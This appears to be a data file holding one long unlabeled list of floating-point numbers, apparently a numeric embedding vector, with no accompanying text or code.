0.011540519073605537, 0.017016295343637466, -0.016411414369940758, -0.022396564483642578, 0.005165377166122198, -0.011445011012256145, 0.015695106238126755, 0.05370718613266945, -0.03037146106362343, -0.05326148495078087, 0.024243047460913658, 0.010712784714996815, 0.024402227252721786, 0.026312382891774178, -0.00735011650249362, -0.00033328222343698144, -0.014572889544069767, -0.02578709088265896, 0.008922014385461807, 0.012272744439542294, 0.008062445558607578, 0.018226061016321182, 0.023240217939019203, 0.01204193476587534, -0.030769411474466324, -0.00509772589430213, 0.03899899497628212, 0.02483201213181019, -0.05584019422531128, 0.009765666909515858, -0.021091293543577194, -0.007254608906805515, -0.015265320427715778, -0.009526897221803665, 0.012949258089065552, -0.018337486311793327, 0.03877614438533783, -0.03772555664181709, -0.023590411990880966, -0.023670000955462456, 0.0012137441663071513, -0.004114791750907898, -0.0033566991332918406, -0.0017380418721586466, -0.0080027524381876, 0.0010068108094856143, -0.0017877855570986867, 0.015257361344993114, -0.018432993441820145, 0.005818013101816177, 0.00042058227700181305, -0.020120296627283096, 0.01757342368364334, -0.010641153901815414, -0.03266364708542824, -0.05574468523263931, 0.008372845128178596, -0.019913364201784134, 0.011994180269539356, -0.0016594469780102372, -0.02414754033088684, 0.0090891532599926, 0.00023852063168305904, -0.02674216777086258, 0.017668932676315308, -0.022555744275450706, 0.002087242202833295, -0.0037466890644282103, -0.023797346279025078, -0.04441110044717789, 0.006180146709084511, 0.0035934788174927235, -0.011198282241821289, 0.022921858355402946, 0.01884686015546322, -0.0347011461853981, 0.007561029400676489, -0.04230992868542671, -0.009773625060915947, 0.010505851358175278, -0.027299296110868454, -0.02282634936273098, 0.02156883105635643, -0.02215779572725296, 0.03358688950538635, -0.017414243891835213, -0.014827576465904713, -0.0023737652227282524, -0.027140116319060326, 0.004628146067261696, 0.05246558412909508, -0.04192790016531944, 0.004389376379549503, 0.02002478949725628, -0.0694022923707962, 0.0029328835662454367, 0.02917761541903019, -0.037630051374435425, -0.05717730149626732, -0.022619416937232018, -0.005177315324544907, -0.06290776282548904, -0.016196520999073982, 0.0014186878688633442, 0.02355857565999031, -0.04991871118545532, -0.02806335873901844, 0.006510444451123476, -0.011445011012256145, -0.00506191048771143, 0.04511148855090141, 0.0060607618652284145, 0.023526739329099655, 0.018321568146348, 0.05061910301446915, 0.016061218455433846, 0.0009401543065905571, 0.027681326493620872, 0.023065119981765747, 0.017223229631781578, -0.01943582482635975, -0.0005021617980673909, -0.009980559349060059, -0.025150371715426445, 0.03137429431080818, 0.005507613066583872, 0.029066190123558044, -0.049600355327129364, 0.010450138710439205, 0.014668397605419159, -0.010752580128610134, 0.001634575193747878, -0.013466591946780682, -0.018146470189094543, -0.023733673617243767, -0.010593400336802006, -0.048422425985336304, 0.05784585699439049, -0.020152132958173752, 0.014501258730888367, -0.027442557737231255, -0.033491380512714386, 0.00029597451793961227, 0.05501245707273483, 0.006009028758853674, 0.010776456445455551, -0.04119567200541496, -0.013164150528609753, 0.022253302857279778, -0.03536970168352127, -0.01941990666091442, 0.01403963752090931, -0.00804652739316225, 0.019101548939943314, -0.026185039430856705, -0.01943582482635975, -0.02371775545179844, 0.024402227252721786, -0.03177224099636078, -0.005424043629318476, -0.002306113950908184, 0.04106833040714264, -0.00047604640712961555, -0.0010456107556819916, 0.037120673805475235, -0.0071232859045267105, -0.008484271354973316, -0.02659890614449978, 0.019483579322695732, 0.012583144940435886, -0.0033507298212498426, 0.028238454833626747, -0.022364730015397072, -0.036643136292696, 0.010052190162241459, 0.00967811793088913, 0.008468353189527988, 0.005471797659993172, 0.0065223826095461845, 0.013227822259068489, 0.01259110402315855, 0.00994076393544674, -0.015368787571787834, 0.002538914093747735, -0.04488863795995712, 0.006247797980904579, 0.0017499803798273206, -0.006430854555219412, 0.02118680067360401, 0.0003350232436787337, -0.01244784239679575, -0.008245501667261124, 0.0044251917861402035, 0.011572354473173618, 0.03108776919543743, -0.047817543148994446, -0.002073313808068633, -0.017477916553616524, 0.027808669954538345, 0.026455644518136978, -0.010187492705881596, -0.03473298251628876, -0.017859946936368942, -0.02023172378540039, 0.03540153428912163, -0.0003996899467892945, -0.01477186381816864, 0.039317354559898376, 0.022794514894485474, -0.027140116319060326, 0.0036133762914687395, -0.009662199765443802, -0.047467347234487534, -0.003080124733969569, -0.0031199194490909576, -0.038362275809049606, -0.0009491081582382321, 0.04676695540547371, -0.04858160391449928, -0.002532944781705737, -0.005873726215213537, -0.017891783267259598, 0.0002489667967893183, 0.0016803393373265862, 0.003424350405111909, -0.02430672012269497, 0.012790078297257423, 0.01432616077363491, -0.008205707184970379, -0.015655310824513435, -0.00685268035158515, 0.0010396415600553155, 0.05001422017812729, -0.025866679847240448, 0.019260728731751442, -0.023510823026299477, -0.030546559020876884, -0.008189789019525051, -0.009128948673605919, 0.028700076043605804, 0.0063592237420380116, 0.032822828739881516, 0.028461307287216187, -0.06414936482906342, 0.0013321340084075928, -0.014302284456789494, -0.014716151170432568, -0.016276109963655472, -0.002970688743516803, 0.006928290706127882, -0.014899207279086113, 0.009264251217246056, 0.02960740029811859, -0.03088083676993847, -0.023208381608128548, 0.04628941789269447, 0.02666257694363594, 0.0015848316252231598, 0.023017365485429764, -0.018639927729964256, 0.0035934788174927235, 0.01787586510181427, -0.004858956206589937, -0.023303888738155365, 0.04444293677806854, -0.004918648861348629, 0.030037185177206993, -0.021457405760884285, 0.013426796533167362, 0.020295394584536552, 0.04587555304169655, -0.011938467621803284, 0.01425452996045351, 0.01477186381816864, -0.01994520053267479, -0.02335164323449135, -0.019992953166365623, -0.03845778480172157, 0.013665566220879555, -0.006478608585894108, 0.01921297423541546, 0.0004409771354403347, -0.005885664373636246, -0.003002524608746171, 0.0011918570380657911, -0.0043097869493067265, -0.01484349463135004, -0.04940933734178543, 0.02643972635269165, 0.012766201049089432, 0.0016863085329532623, -0.005296700168401003, 0.01957908645272255, 0.005045992322266102, 0.025007110089063644, -0.055872026830911636, -0.006287592928856611, 0.002777683548629284, -0.022046370431780815, 0.0444747731089592, -0.005810054484754801, 0.033045679330825806, 0.013761073350906372, 0.014931043609976768, 0.006402998231351376, -0.007624701131135225, -0.009160784073174, 0.013975965790450573, -0.05030074343085289, 0.02268308773636818, 0.01884686015546322, -0.003708883887156844, -0.020152132958173752, 0.007338178344070911, 0.0002464796125423163, -0.0026085551362484694, -0.018560336902737617, -0.008197748102247715, 0.0012614980805665255, 0.007951019331812859, 0.006717377807945013, 0.014477381482720375, 0.011158487759530544, -0.01503450982272625, 0.008532024919986725, -0.00029298989102244377, 0.017016295343637466, 0.007023798301815987, 0.03769372031092644, -0.006749213673174381, -0.0001616667432244867, -0.014389833435416222, -0.000573543889913708, 0.0180350448936224, -0.02903435379266739, -0.049441173672676086, 0.04488863795995712, -0.011827042326331139, 0.040081415325403214, -0.027378885075449944, -0.007163080386817455, 0.006084639113396406, 0.01631590537726879, -0.015894079580903053, -0.004162545781582594, -0.023892853409051895, 0.0640220195055008, -0.03234528750181198, -0.014095351099967957, 0.0031418066937476397, 0.002759775845333934, -0.018878696486353874, -0.005109664052724838, -0.021552912890911102, -0.01514593604952097, 0.011301749385893345, 0.0013490468263626099, 0.00424611521884799, 0.017223229631781578, 0.01706404983997345, 0.029639234766364098, -0.007190937176346779, 0.00010073082376038656, 0.011166446842253208, 0.018894614651799202, -0.009701994247734547, -0.005344454199075699, 0.04240543767809868, 0.022476155310869217, -0.023383477702736855, -0.03848962113261223, 0.00021252960141282529, -0.008866301737725735, -0.01093563623726368, -0.03197917714715004, 0.012511514127254486, 0.008579778485000134, 0.01779627613723278, 0.045015983283519745, 0.007779901381582022, 0.048040393739938736, -0.012758241966366768, 0.02187127247452736, 0.013267616741359234, -0.007147162687033415, 0.01720731146633625, 0.026710331439971924, -0.01883094385266304, -0.008516106754541397, -0.004532638005912304, 0.027665408328175545, 0.06793784350156784, -0.01266273483633995, 0.024577325209975243, 0.012678653001785278, -0.025054864585399628, -0.029893923550844193, -0.0019101548241451383, 0.013203945010900497, -0.01750975288450718, -0.0003611386346165091, 0.03285466134548187, 0.04415641352534294, -0.014652479439973831, -0.028047440573573112, -0.02452957071363926, -0.007091449573636055, 0.009972600266337395, 0.005443941336125135, -0.020056625828146935, -0.018639927729964256, -0.02142556942999363, 0.0017977342940866947, 0.013601894490420818, 0.03584723919630051, 0.035497043281793594, -0.028715994209051132, 0.020725179463624954, -0.01074462104588747, 0.03116736002266407, 0.014007802121341228, -0.0022106063552200794, 0.0017231188248842955, 0.04355153068900108, 0.013235781341791153, -0.004130709916353226, -0.009590568952262402, 0.018432993441820145, -0.04039977490901947, -0.010402385145425797, 0.04164137691259384, -0.004417233169078827, -0.0050260950811207294, 0.00920057948678732, -0.022269221022725105, 0.02008846215903759, 0.01992928236722946, -0.003406442701816559, -0.0056031206622719765, -0.01574285887181759, -0.021982697769999504, -0.014127186499536037, 0.005252925679087639, 0.01852850243449211, -0.023892853409051895, 0.013983924873173237, 0.04297848418354988, -0.016666101291775703, 0.012026016600430012, -0.005802095402032137, -0.013538222759962082, 0.01698446087539196, -0.008945891633629799, -0.006076680030673742, 0.0026364116929471493, -0.043010320514440536, 0.016952624544501305, 0.010776456445455551, 0.014835535548627377, 0.012280703522264957, 0.0022026472724974155, 0.01562347449362278, 0.021521078422665596, -0.020788852125406265, 0.006932270247489214, 0.012360293418169022, -0.008197748102247715, 0.009160784073174, 0.0006252772291190922, -0.007401850074529648, -0.011325626634061337, 0.028556814417243004, -0.007939080707728863, -0.007867449894547462, -0.005073848646134138, 0.009837297722697258, -0.004285909701138735, 0.002712021814659238, -0.018305649980902672, -0.004488863982260227, -0.016196520999073982, -0.022396564483642578, 0.01562347449362278, -0.008834466338157654, -0.022428400814533234, -0.006371162366122007, -0.022253302857279778, -0.01181112416088581, -0.01572694070637226, -0.036897823214530945, 0.002976657822728157, 0.003497970988973975, -0.0004153591871727258, 0.013617811724543571, 0.007453583180904388, 0.026933183893561363, -0.013570058159530163, -0.013713319785892963, 0.018926450982689857, 0.011643985286355019, -0.01543245930224657, 0.007815716788172722, 0.002507078228518367, 0.00849223043769598, 0.010171574540436268, -0.009264251217246056, 0.019754184409976006, 0.0162920281291008, -0.043105825781822205, 0.007931121625006199, 0.036738645285367966, -0.0046520228497684, 0.020741097629070282, 0.017764439806342125, 0.015321033075451851, -0.0021747909486293793, 0.0009446312324143946, 0.01048197504132986, -0.012081729248166084, -0.03603825345635414, -0.00793510116636753, 0.011039103381335735, 0.044347427785396576, -0.016156725585460663, 0.003541745478287339, 0.004492843523621559, -0.03029187209904194, 0.0024473858065903187, 0.004572432953864336, 0.020279476419091225, 0.037120673805475235, 0.0014684315538033843, 0.002324021654203534, -0.03839411213994026, 0.007696331944316626, 0.01166786253452301, 0.007190937176346779, 0.022141877561807632, -0.02104353904724121, -0.0029348733369261026, 0.017987290397286415, -0.021154964342713356, -0.03524235635995865, 0.008961809799075127, 0.005555367097258568, 0.018305649980902672, -0.001827580388635397, -0.02451365441083908, -0.04084547609090805, 0.01838524080812931, 0.04313766211271286, 0.013522304594516754, 0.015368787571787834, -0.012543350458145142, -0.0009466210030950606, -0.0019280625274404883, -0.013458632864058018, -0.02666257694363594, 0.0375027060508728, 0.009113030508160591, 0.03737536445260048, -0.0456208661198616, 0.00685268035158515, 0.04396539553999901, -0.0211231280118227, -0.01787586510181427, 0.01668201945722103, -0.002544883405789733, -0.0018056932603940368, -0.03708884119987488, -0.01978602074086666, -0.00949506089091301, -0.028827419504523277, -0.010784415528178215, -0.017971374094486237, 0.025803007185459137, -0.011723575182259083, 0.010625236667692661, 0.01795545592904091, 0.0029388528782874346, 0.024927521124482155, -0.009829338639974594, -0.0024115703999996185, -0.0028433450497686863, 0.007943060249090195, 0.006733295973390341, -0.051223985850811005, -0.0008461389224976301, 0.007907245308160782, -0.010211369022727013, 0.017239147797226906, -0.02215779572725296, 0.01388841774314642, -0.005173335783183575, 0.023590411990880966, 0.01749383471906185, -0.009996476583182812, 0.006096577271819115, -0.023144708946347237, -0.024211212992668152, -0.0015510058728978038, 0.035051342099905014, -0.001346062170341611, 0.02061375416815281, -0.025214044377207756, 0.032759156078100204, -0.027060527354478836, -0.03543337062001228, -0.03272731974720955, -0.023176545277237892, -0.036229271441698074, -0.016952624544501305, -0.0211231280118227, -0.00006535067223012447, 0.009097112342715263, 0.02777683548629284, 0.05975601077079773, 0.010784415528178215, 0.0034342992585152388, 0.007736126892268658, 0.0022822371684014797, -0.011246036738157272, 0.002387693617492914, 0.01771668531000614, -0.00022123473172541708, 0.0075411321595311165, 0.01081625185906887, -0.018560336902737617, 0.030339626595377922, -0.029893923550844193, -0.0009864158928394318, -0.004142648074775934, 0.02031131274998188, -0.027315214276313782, 0.012909462675452232, 0.002968698972836137, 0.0009630363783799112, -0.02311287261545658, 0.048486094921827316, -0.007680414244532585, -0.010171574540436268, -0.0015679188072681427, 0.02207820676267147, 0.015814490616321564, 0.022714924067258835, -0.0031597143970429897, 0.00856386125087738, 0.004045150708407164, -0.03368239849805832, -0.012439883314073086, -0.00609259819611907, -0.04829508066177368, 0.007342157419770956, -0.0037466890644282103, -0.018194224685430527, -0.032918334007263184, 0.00607270048931241, 0.00424611521884799, -0.03361872583627701, -0.03403259068727493, 0.010362589731812477, 0.047085314989089966, -0.013952089473605156, -0.027538064867258072, -0.01943582482635975, -0.009479143656790257, -0.012503555044531822, -0.01145297009497881, 0.017270982265472412, 0.006192085333168507, 0.008436516858637333, -0.027235623449087143, -0.011548478156328201, 0.011309708468616009, 0.03457380086183548, 0.0062000444158911705, 0.0017818162450566888, -0.0010073082521557808, 0.005328536033630371, -0.010641153901815414, 0.009025481529533863, 0.010171574540436268, -0.028127029538154602, -0.01576673611998558, 0.0003743206907529384, 0.03307751566171646, -0.0347011461853981, 0.02274676039814949, 0.015169813297688961, 0.012599063105881214, 0.015655310824513435, -0.03330036625266075, 0.007958978414535522, -0.013936171308159828, 0.016116932034492493, -0.007190937176346779, -0.002526975702494383, -0.01310843788087368, 0.016101013869047165, 0.008794670924544334, 0.0004248104814905673, 0.004695797339081764, -0.0017887804424390197, 0.0045604947954416275, -0.018337486311793327, -0.04683062806725502, -0.00375663791783154, 0.020884359255433083, 0.018783189356327057, -0.01913338340818882, -0.007572968024760485, 0.023287970572710037, -0.0002937360550276935, -0.01927664503455162, 0.02392468973994255, -0.024036115035414696, 0.010466056875884533, -0.008890178985893726, -0.02990984171628952, -0.013140273280441761, -0.005014156457036734, 0.026614824309945107, -0.017270982265472412, -0.02473650500178337, -0.011015226133167744, 0.025166289880871773, -0.015599598176777363, 0.039317354559898376, -0.02623279206454754, -0.014159022830426693, -0.012368252500891685, 0.03594274818897247, -0.05042808875441551, -0.018639927729964256, -0.029225368052721024, -0.022428400814533234, -0.019181137904524803, -0.002037498401477933, 0.01514593604952097, 0.0304988045245409, -0.02613728493452072, 0.013363124802708626, -0.032982006669044495, 0.0019031907431781292, 0.03169265389442444, 0.019181137904524803, -0.002783652627840638, -0.028238454833626747, -0.0027179911267012358, 0.002795591251924634, -0.03540153428912163, -0.022555744275450706, 0.014127186499536037, -0.005495674442499876, -0.011986221186816692, -0.011437051929533482, -0.009471184574067593, -0.003497970988973975, 0.017446080222725868, -0.00978158414363861, -0.003155734855681658, 0.010712784714996815, 0.02976658008992672, -0.004381417762488127, -0.02777683548629284, -0.0038620943669229746, -0.02909802459180355, 0.01809871755540371, 0.015090223401784897, 0.0035457247868180275, 0.0040033659897744656, 0.004775387234985828, -0.0187513530254364, 0.009240373969078064, -0.03027595393359661, -0.0008152978261932731, 0.00653432123363018, -0.003482053056359291, 0.03175632283091545, -0.026567069813609123, -0.00792316347360611, 0.013737197034060955, -0.008730999194085598, 0.029368629679083824, 0.04039977490901947, 0.025150371715426445, -0.01684119924902916, 0.006900434382259846, -0.014278407208621502, -0.0077003114856779575, 0.006840742193162441, 0.018273813650012016, -0.01019545178860426, -0.015496131032705307, 0.009590568952262402, -0.0012207083636894822, 0.0037606172263622284, -0.04854976758360863, 0.016276109963655472, -0.008301214314997196, -0.037566378712654114, -0.04654410481452942, 0.023287970572710037, -0.01488329004496336, -0.010991348884999752, 0.02984616905450821, 0.0062000444158911705, -0.0003661130031105131, -0.032313451170921326, 0.033873412758111954, 0.015512049198150635, 0.0059493365697562695, -0.013968006707727909, -0.00013741673319600523, -0.011381339281797409, -0.026837674900889397, 0.034319113940000534, 0.018273813650012016, 0.033204857259988785, -0.017764439806342125, 0.017270982265472412, 0.004608248360455036, 0.008977727964520454, -0.030896754935383797, 0.039476532489061356, 0.011174405924975872, -0.010259123519062996, -0.031804077327251434, 0.023081038147211075, -0.008114178664982319, -0.017923619598150253, -0.0022424422204494476, -0.002059385646134615, 0.01240804698318243, 0.02406795136630535, 0.018942369148135185, 0.021759847179055214, 0.003219406818971038, 0.003265170846134424, -0.029559645801782608, 0.0020365035161376, -0.00885834265500307, 0.023956524208188057, -0.004146627616137266, -0.030100855976343155, -0.005073848646134138, -0.03295017033815384, 0.02674216777086258, -0.0037665865384042263, -0.005316597409546375, -0.0222373865544796, 0.009128948673605919, -0.014381874352693558, 0.010426261462271214, -0.0187513530254364, -0.0015191700076684356, -0.019260728731751442, -0.017780357971787453, -0.003064206801354885, -0.019754184409976006, -0.008587737567722797, -0.005591182503849268, 0.016101013869047165, 0.07322259992361069, 0.009885051287710667, 0.010179533623158932, -0.023144708946347237, 0.013219863176345825, 0.014159022830426693, -0.006100556813180447, 0.004918648861348629, 0.010625236667692661, 0.005125582218170166, 0.0212663896381855, 0.002298155101016164, -0.03073757514357567, 0.013554139994084835, 0.017382409423589706, 0.015336951240897179, 0.017414243891835213, -0.0053922077640891075, 0.01765301451086998, -0.0033228734973818064, -0.02680583856999874, 0.022651253268122673, 0.023956524208188057, -0.021950863301753998, 0.004759469069540501, -0.0110470624640584, 0.010306877084076405, 0.0031676734797656536, -0.009224455803632736, -0.005117623135447502, -0.013347206637263298, 0.014946961775422096, -0.015854284167289734, -0.007310321554541588, -0.017048131674528122, 0.012861709110438824, 0.012599063105881214, -0.006343305576592684, -0.02253982611000538, -0.012790078297257423, 0.007226752582937479, -0.00162462645675987, -0.012909462675452232, -0.035783566534519196, -0.0022285140585154295, -0.0068208444863557816, 0.03568805754184723, 0.02296961098909378, 0.002694114111363888, -0.012758241966366768, -0.001346062170341611, -0.024020196869969368, 0.011779287829995155, 0.021584749221801758, -0.003730771131813526, 0.029209451749920845, 0.00864345021545887, 0.002316062804311514, -0.02444998174905777, -0.010832170024514198, 0.01927664503455162, 0.004998238291591406, -0.0001685064926277846, 0.008516106754541397, -0.00034845402115024626, 0.02429080195724964, -0.03226570039987564, -0.016220398247241974, -0.009725871495902538, 0.034319113940000534, -0.011317667551338673, 0.02459324337542057, 0.01012382097542286, -0.018146470189094543, 0.01927664503455162, 0.006450751796364784, 0.023208381608128548, 0.020327230915427208, -0.020215805619955063, -0.009327922947704792, 0.053293321281671524, 0.02901843562722206, -0.006609931588172913, 0.02134598046541214, -0.011142569594085217, 0.012949258089065552, -0.011206241324543953, -0.036674972623586655, 0.00048574639367870986, -0.009009563364088535, 0.005065889563411474, 0.0007267541950568557, 0.026535233482718468, -0.005873726215213537, -0.006999921519309282, 0.010927677154541016, 0.010665031149983406, -0.01450921781361103, -0.008269378915429115, -0.025834843516349792, -0.017780357971787453, -0.016196520999073982, 0.01631590537726879, -0.0018325548153370619, -0.013458632864058018, 0.01757342368364334, -0.00234391912817955, 0.0093040456995368, -0.01226478535681963, 0.004242135677486658, -0.006223921198397875, 0.006506464909762144, 0.0013709340710192919, -0.019149301573634148, -0.007071552332490683, 0.002809519413858652, 0.015615515410900116, -0.0030920631252229214, 0.012217031791806221, -0.0225239098072052, -0.014015761204063892, -0.020804770290851593, 0.006132392678409815, 0.005165377166122198, 0.0021747909486293793, 0.010959513485431671, 0.002288206247612834, 0.0033706272952258587, -0.007958978414535522, 0.025357306003570557, 0.03295017033815384, -0.0015122059267014265, 0.0014107289025560021, -0.023670000955462456, 0.028270291164517403, 0.010609318502247334, 0.027967849746346474, 0.009510979056358337, -0.01588612049818039, 0.002509067999199033, -0.009837297722697258, 0.011842959560453892, 0.02667849510908127, -0.00635524420067668, 0.006649726536124945, -0.012169278226792812, -0.014668397605419159, 0.004341622814536095, 0.020565999671816826, 0.042882975190877914, -0.004074996802955866, -0.013458632864058018, 0.011548478156328201, 0.010163615457713604, 0.002017600927501917, 0.004429171327501535, 0.02481609396636486, 0.005165377166122198, 0.006223921198397875, 0.003446237649768591, 0.01237621158361435, 0.009956682100892067, 0.015233485028147697, -0.030610231682658195, -0.01100726705044508, 0.008317132480442524, 0.014079432934522629, -0.02386101707816124, -0.014668397605419159, -0.03272731974720955, 0.013243740424513817, 0.008325091563165188, -0.02554832026362419, -0.009789543226361275, -0.0008938927785493433, -0.0005407130811363459, -0.0007541131926700473, 0.032822828739881516, -0.0017619188874959946, -0.017239147797226906, 0.007461542263627052, 0.004540597088634968, -0.00324129406362772, -0.008985687047243118, 0.025898516178131104, -0.02177576534450054, -0.007091449573636055, -0.014485340565443039, -0.016650183126330376, 0.026280546560883522, 0.0212663896381855, -0.0021469343919306993, -0.009916886687278748, -0.030785327777266502, -0.0035755711141973734, 0.00019947189139202237, 0.011795205995440483, 0.002562791109085083, 0.008325091563165188, 0.012758241966366768, 0.01720731146633625, -0.005053951404988766, 0.003937704488635063, -0.013450673781335354, 0.040145087987184525, -0.04151403158903122, 0.004397335462272167, 0.006192085333168507, -0.0036511814687401056, -0.03307751566171646, 0.01100726705044508, 0.007039716467261314, 0.012742324732244015, -0.003704904345795512, -0.01432616077363491, 0.012033975683152676, -0.027538064867258072, -0.021759847179055214, -0.011238077655434608, 0.012010098434984684, 0.006796967703849077, 0.000915282522328198, 0.015352869406342506, 0.015957752242684364, -0.004069027490913868, 0.004078976344317198, 0.024211212992668152, -0.0495048463344574, 0.02629646472632885, -0.012089688330888748, -0.0013430776307359338, -0.0036133762914687395, 0.022778596729040146, -0.0028871195390820503, -0.016260193660855293, -0.02629646472632885, -0.00802662968635559, -0.01692078821361065, 0.019149301573634148, -0.01655467599630356, 0.01735057309269905, -0.006144331302493811, -0.03508317843079567, 0.009797502309083939, 0.00777592184022069, -0.0003748181334231049, -0.01956316828727722, 0.007887347601354122, 0.01477186381816864, 0.015917956829071045, 0.00949506089091301, 0.013784950599074364, -0.0037785249296575785, -0.011126651428639889, -0.013554139994084835, 0.02858865074813366, 0.030466970056295395, -0.0031437964644283056, 0.0335550531744957, -0.01988152787089348, 0.029893923550844193, -0.02983025088906288, 0.007429706398397684, 0.027458475902676582, -0.0017808214761316776, 0.01625223457813263, -0.020581917837262154, -0.0021986677311360836, 0.008460394106805325, -0.013641688972711563, -0.012065811082720757, 0.008890178985893726, 0.014389833435416222, -0.005380269605666399, -0.017828112468123436, -0.008707121945917606, -0.002976657822728157, -0.014143104664981365, -0.02828620932996273, 0.00989301037043333, -0.00904139969497919, 0.04234176501631737, -0.017541589215397835, -0.03232936933636665, -0.00856386125087738, -0.03248855099081993, -0.00842059962451458, 0.003730771131813526, 0.012837831862270832, -0.023797346279025078, -0.008516106754541397, -0.003499960759654641, -0.0061124954372644424, -0.008977727964520454, 0.009988517500460148, 0.012431924231350422, -0.0019728317856788635, 0.0003534283896442503, 0.0035894992761313915, 0.010322795249521732, -0.0075411321595311165, -0.002039488172158599, 0.028047440573573112, 0.002522996161133051, -0.03073757514357567, 0.01536082848906517, -0.008539984002709389, -0.03451013192534447, -0.029878005385398865, -0.040813639760017395, 0.007716229651123285, -0.004620186984539032, -0.017032213509082794, -0.030896754935383797, -0.04100465774536133, -0.014238612726330757, -0.0019340317230671644, 0.017095886170864105, 0.028095193207263947, 0.0016574572073295712, 0.022062288597226143, -0.019897446036338806, -0.02873191237449646, 0.00230014487169683, -0.002292185788974166, 0.011357462033629417, 0.007907245308160782, 0.012941299006342888, -0.012129482813179493, -0.009805461391806602, 0.0004123745602555573, 0.00001940000947797671, 0.003913827706128359, 0.0017957445234060287, -0.01568714715540409, -0.013243740424513817, 0.005810054484754801, 0.02327205240726471, -0.01941990666091442, -0.012416006065905094, -0.04307398945093155, 0.030928589403629303, 0.0111903240904212, 0.022062288597226143, -0.00015980136231519282, -0.018576255068182945, 0.017461998388171196, 0.007039716467261314, 0.014055555686354637, -0.007425726857036352, 0.0020474472548812628, -0.013243740424513817, -0.0026861552614718676, 0.0044689662754535675, 0.0012804006692022085, 0.003018442541360855, 0.013028847984969616, 0.0009510979289188981, 0.0009545799694024026, -0.02562791109085083, -0.01351434551179409, 0.018448911607265472, -0.0006576105952262878, -0.003991427831351757, 0.0030960426665842533, 0.009845255874097347, 0.009208537638187408, 0.01388841774314642, 0.0335550531744957, 0.016459167003631592, 0.03938102349638939, 0.010386466979980469, 0.017621178179979324, -0.00875487644225359, -0.0013410878600552678, -0.01801912672817707, 0.0300690196454525, -0.010497892275452614, 0.002524985931813717, 0.00016937700274866074, 0.006032905541360378, 0.00324129406362772, 0.003983468748629093, -0.008707121945917606, -0.03317302092909813, -0.008181829936802387, -0.0015619494952261448, 0.0010814261622726917, -0.009447307325899601, -0.002775693777948618, -0.0005954310763627291, -0.02172801084816456, -0.001407744362950325, 0.028843337669968605, -0.006068720947951078, -0.022364730015397072, 0.002548862947151065, 0.001847477862611413, -0.018496666103601456, -0.01219315454363823, -0.021887190639972687, 0.029798414558172226, 0.015130017884075642, 0.01978602074086666, 0.025023028254508972, 0.01204193476587534, 0.020852522924542427, 0.007783880922943354, 0.0023777447640895844, 0.002998545067384839, 0.020279476419091225, 0.018894614651799202, -0.008090301416814327, -0.04129118099808693, -0.04135485365986824, 0.02282634936273098, 0.0004810207465197891, 0.004409274086356163, 0.01022728718817234, -0.011476847343146801, -0.002767734695225954, -0.02429080195724964, -0.026758085936307907, -0.0015112110413610935, -0.0032870580907911062, -0.014939002692699432, -0.0059453570283949375, -0.012877627275884151, -0.00738593190908432, -0.022030452266335487, -0.023017365485429764, 0.008476312272250652, 0.020359067246317863, 0.01333128847181797, -0.0021310164593160152, -0.009168743155896664, -0.02172801084816456, -0.02289002202451229, -0.01647508516907692, 0.005941377487033606, 0.009097112342715263, -0.025818925350904465, -0.015090223401784897, -0.012288662604987621, -0.01185887772589922, -0.011548478156328201, -0.0020494370255619287, 0.007071552332490683, -0.019149301573634148, 0.003673068480566144, 0.033268529921770096, -0.004170504864305258, -0.013227822259068489, 0.018305649980902672, 0.00009059556032298133, -0.00009476158447796479, 0.01779627613723278, 0.004854976665228605, -0.0011699697934091091, 0.01677752658724785, -0.0020275497809052467, -0.0059453570283949375, 0.002302134409546852, 0.0040013762190938, 0.010474015958607197, 0.00006096701690694317, -0.015265320427715778, -0.0035556736402213573, 0.00023901807435322553, -0.02362224832177162, 0.019021958112716675, 0.012320498935878277, 0.00022546293621417135, -0.014095351099967957, 0.0077918400056660175, -0.006538300774991512, 0.027490312233567238, 0.0018096726853400469, -0.012121523730456829, 0.0012764211278408766, 0.008922014385461807, 0.002333970507606864, -0.016602428629994392, 0.009932804852724075, -0.011819083243608475, 0.03333220258355141, 0.014286366291344166, 0.0016674059443175793, 0.009582609869539738, 0.004441109951585531, -0.007194916717708111, 0.019260728731751442, -0.008098260499536991, 0.00642687501385808, 0.012400088831782341, -0.005197213031351566, 0.008532024919986725, 0.013952089473605156, -0.000205814212677069, 0.011755411513149738, -0.012527432292699814, -0.014166981913149357, 0.01750975288450718, -0.01992928236722946, 0.0033089453354477882, -0.004385397303849459, -0.0008406671113334596, 0.014421668834984303, 0.0018216111930087209, -0.01994520053267479, -0.0012983083724975586, 0.012065811082720757, -0.014859412796795368, 0.02483201213181019, 0.019674595445394516, 0.013872499577701092, -0.0019708420149981976, -0.0051892539486289024, -0.00020855010370723903, -0.02082068845629692, 0.002097190823405981, 0.008508147671818733, -0.013490468263626099, -0.0035298068542033434, -0.012177237309515476, 0.021552912890911102, 0.004389376379549503, 0.021966779604554176, -0.019626840949058533, 0.0027219706680625677, 0.007401850074529648, 0.0038282687310129404, -0.002320042112842202, -0.028986599296331406, -0.005619038827717304, 0.0005203182226978242, 0.011253995820879936, -0.0008575799292884767, -0.009701994247734547, -0.015615515410900116, 0.001416698214598, -0.010068107396364212, 0.007529193535447121, -0.016506921499967575, 0.001600749557837844, 0.007509296294301748, 0.02672624960541725, -0.013753114268183708, -0.02400427870452404, 0.012089688330888748, 0.0028692118357867002, -0.006729316432029009, -0.004285909701138735, -0.02355857565999031, -0.004866915289312601, 0.002765744924545288, 0.0021429548505693674, 0.009033440612256527, -0.013291493989527225, 0.003468124894425273, 0.002067344728857279, -0.0024394269566982985, 0.01019545178860426, -0.006287592928856611, 0.017828112468123436, 0.012296621687710285, 0.0021907088812440634, 0.006757172755897045, 0.004878853913396597, -0.010951554402709007, 0.0035397557076066732, 0.004496822599321604, -0.0065223826095461845, 0.003885971149429679, -0.00372082251124084, -0.000199596252059564, 0.005969233810901642, -0.03743903338909149, -0.003981478977948427, 0.014445546083152294, 0.00012019301357213408, 0.011827042326331139, -0.009916886687278748, -0.0073302192613482475, -0.015464294701814651, -0.020741097629070282, 0.00982137955725193, -0.01155643630772829, -0.007966937497258186, -0.0006352259661071002, 0.01809871755540371, 0.007358075585216284, -0.006168208085000515, 0.011564395390450954, 0.0014654468977823853, -0.013546180911362171, 0.0007217798847705126, -0.02414754033088684, 0.007143183145672083, 0.018337486311793327, -0.007226752582937479, 0.012097647413611412, -0.02355857565999031, -0.004266012459993362, -0.003949643112719059, -0.0019091599388048053, 0.037852901965379715, 0.00830917339771986, -0.01773260347545147, 0.0006367182941175997, 0.027967849746346474, -0.010306877084076405, -0.007600824348628521, -0.006940229330211878, 0.01876727119088173, -0.0014843494864180684, 